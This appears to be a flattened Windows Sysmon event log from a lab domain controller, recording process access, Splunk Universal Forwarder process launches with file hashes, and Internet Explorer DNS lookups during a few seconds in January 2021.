13:31:18.732{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013210Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:18.732{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-47A6-6000-4105-000000009A01}6320C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013209Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:18.734{08A6967A-47A6-6000-4105-000000009A01}6320C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x800000000000000013208Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:17.334{08A6967A-4781-6000-3A05-000000009A01}6928service.maxymiser.net0type: 5 service.maxymiser.net.edgekey.net;type: 5 e5886.x.akamaiedge.net;::ffff:104.84.103.101;C:\Program Files (x86)\Internet Explorer\iexplore.exe 22542200x800000000000000013207Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:16.656{08A6967A-4781-6000-3A05-000000009A01}6928pages.dyn.com0type: 5 dyn.mktoweb.com;type: 5 sj08.mktossl.com;::ffff:104.17.74.206;::ffff:104.17.70.206;::ffff:104.17.71.206;::ffff:104.17.72.206;::ffff:104.17.73.206;C:\Program Files (x86)\Internet Explorer\iexplore.exe 22542200x800000000000000013206Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:15.819{08A6967A-4781-6000-3A05-000000009A01}6928dyn.com0::ffff:156.151.59.19;C:\Program Files (x86)\Internet Explorer\iexplore.exe 10341000x800000000000000013205Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:18.373{08A6967A-4754-6000-1705-000000009A01}34082820C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013204Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:18.342{08A6967A-4754-6000-1705-000000009A01}34085404C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+2fd1a|C:\Windows\Explorer.EXE+2ff29|C:\Windows\Explorer.EXE+2fc59|C:\Windows\Explorer.EXE+3ab97|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013203Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:18.342{08A6967A-4754-6000-1705-000000009A01}34085404C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+3007c|C:\Windows\Explorer.EXE+30028|C:\Windows\Explorer.EXE+2fccc|C:\Windows\Explorer.EXE+2ff29|C:\Windows\Explorer.EXE+2fc59|C:\Windows\Explorer.EXE+3ab97|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013202Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:18.342{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baa08(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1ba9bf(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1ba966(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+3a8abf(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b324e(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b319b(wow64)|C:\Program Files (x86)\Internet Explorer\IEShims.dll+3fc44(wow64)|C:\Windows\SYSTEM32\urlmon.dll+10c870(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5b40a(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bbb0(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bccc(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+40bd89(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+594080(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+4d2dd7(wow64) 10341000x800000000000000013201Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:18.295{08A6967A-47A6-6000-4005-000000009A01}68166648C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013200Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:18.123{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-47A6-6000-4005-000000009A01}6816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013199Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:18.123{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013198Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:18.123{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013197Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:18.123{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013196Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:18.123{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013195Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:18.123{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-47A6-6000-4005-000000009A01}6816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013194Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:18.123{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-47A6-6000-4005-000000009A01}6816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013193Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:18.124{08A6967A-47A6-6000-4005-000000009A01}6816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x800000000000000013219Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:17.479{08A6967A-4781-6000-3A05-000000009A01}6928munchkin.marketo.net0type: 5 wildcard.marketo.net.edgekey.net;type: 5 e10776.b.akamaiedge.net;::ffff:104.125.78.241;C:\Program Files (x86)\Internet Explorer\iexplore.exe 22542200x800000000000000013218Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:17.479{08A6967A-4781-6000-3A05-000000009A01}6928code.jquery.com0type: 5 cds.s5x3j6q5.hwcdn.net;::ffff:209.197.3.24;C:\Program Files (x86)\Internet Explorer\iexplore.exe 10341000x800000000000000013227Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:20.170{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-47A8-6000-4205-000000009A01}6308C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013226Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:20.170{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013225Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:20.170{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013224Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:20.170{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013223Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:20.170{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013222Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:20.170{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-47A8-6000-4205-000000009A01}6308C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013221Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:20.170{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-47A8-6000-4205-000000009A01}6308C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013220Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:20.171{08A6967A-47A8-6000-4205-000000009A01}6308C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013235Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:24.529{08A6967A-4754-6000-1705-000000009A01}34082820C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013234Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:24.514{08A6967A-4754-6000-1705-000000009A01}34085404C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+2fd1a|C:\Windows\Explorer.EXE+2ff29|C:\Windows\Explorer.EXE+2fc59|C:\Windows\Explorer.EXE+3ab97|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 